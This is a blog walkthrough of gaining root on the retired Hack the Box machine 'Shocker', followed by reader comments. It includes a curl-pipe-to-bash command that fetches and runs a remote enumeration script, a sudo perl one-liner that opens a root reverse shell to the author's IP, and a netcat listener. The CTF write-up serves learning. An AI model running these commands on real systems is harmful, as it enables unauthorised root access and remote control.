Hack the Box – Shocker – Part 2 (System Flag)
# Information:
Platform Name: Hack the Box
Machine Challenge: Shocker
Machine Status: Retired
Machine Matrix:
- Enum: 5.5
- CTF: 5.1
- Custom: 3.7
- CVE: 6.3
- Real: 4.9
Challenge Level: Easy
Part 2: System Flag
Note: This is the continuation of Hack the Box – Shocker – Part 1 (User Flag). Take a look to the first part!
# Writeup: (Continuation)
Step 1
Okay, we now have access to the terminal of the Shocker machine, but we cannot yet access it as root. After trying to change directory to /root I got: “Permission denied”.
We need a way to escalate privilege and get to root. One such tool is LinEnum.sh.
According to DRD_ at Null Byte: LinEnum is a tool used to Identify Potential Privilege Escalation Vectors.
To be able to run LinEnum and see the results we need to create an HTTP server on our machine, to do so I used python’s SimpleHTTPServer flag, see the command below:
mregra on Cyber:VM/HTB/Shocker $ python -m SimpleHTTPServer 7777
After starting the HTTP server we can go back to the remote terminal of the Shocker machine and run the command:
shelly@Shocker:/usr/lib/cgi-bin$ $ curl 10.10.14.26:7777/LinEnum.sh | bash
Which returns a long output, like so:
After analyzing the output I was able to find this:
It seems we can run perl commands and files as root without password!! This is our way in!
Step 2
Now, what we need to do is to create a root reverse shell, to do so let’s go back to Pentestmonkey website and get the perl script.
After getting the script, what I did was I opened a text editor on my VM and pasted the perl script there. I went back to the Shocker remote terminal and did sudo -l with the objective of discovering the full path for perl, which was /usr/bin/perl
Now, let’s go back to the text editor and let’s edit the perl command. The final command:
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.26";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The 10.10.14.26 is my VM’s IP, you should change that IP to yours.
As you can see, the port I choose was the one that was already there, 1234.
Once the command was configured to our specific case I went back to my VM’s terminal and executed the command:
mregra on Cyber:VM/HTB/Shocker $ nc -lvnp 1234
This command, as you know from the previous Shocker post, starts a TCP server on port 1234.
Once this was finished I went back to the Shocker’s remote terminal and run the perl command that I previously configured:
As you can see, after running whoami we get “root”. We succeed on escalating to root!!
After some search I was able to find the flag at /root/root.txt
Thank you very much for reading!
Cheers,
MRegra
Share this post:
Does your site have a contact page? I’m having problems locating it
but, I’d like to shoot you an email. I’ve got some creative ideas for your blog you might
be interested in hearing. Either way, great blog and I look forward to seeing it develop
over time.
Hello, the contact page can be found here: https://mregraoncyber.com/contact/
Thanks for reading and glad you enjoyed.
Have a nice day!
I know this if off topic but I’m looking into starting my own blog and was curious
what all is needed to get setup? I’m assuming having a blog like yours would cost a pretty penny?
I’m not very internet smart so I’m not 100% sure.
Any suggestions or advice would be greatly appreciated.
Appreciate it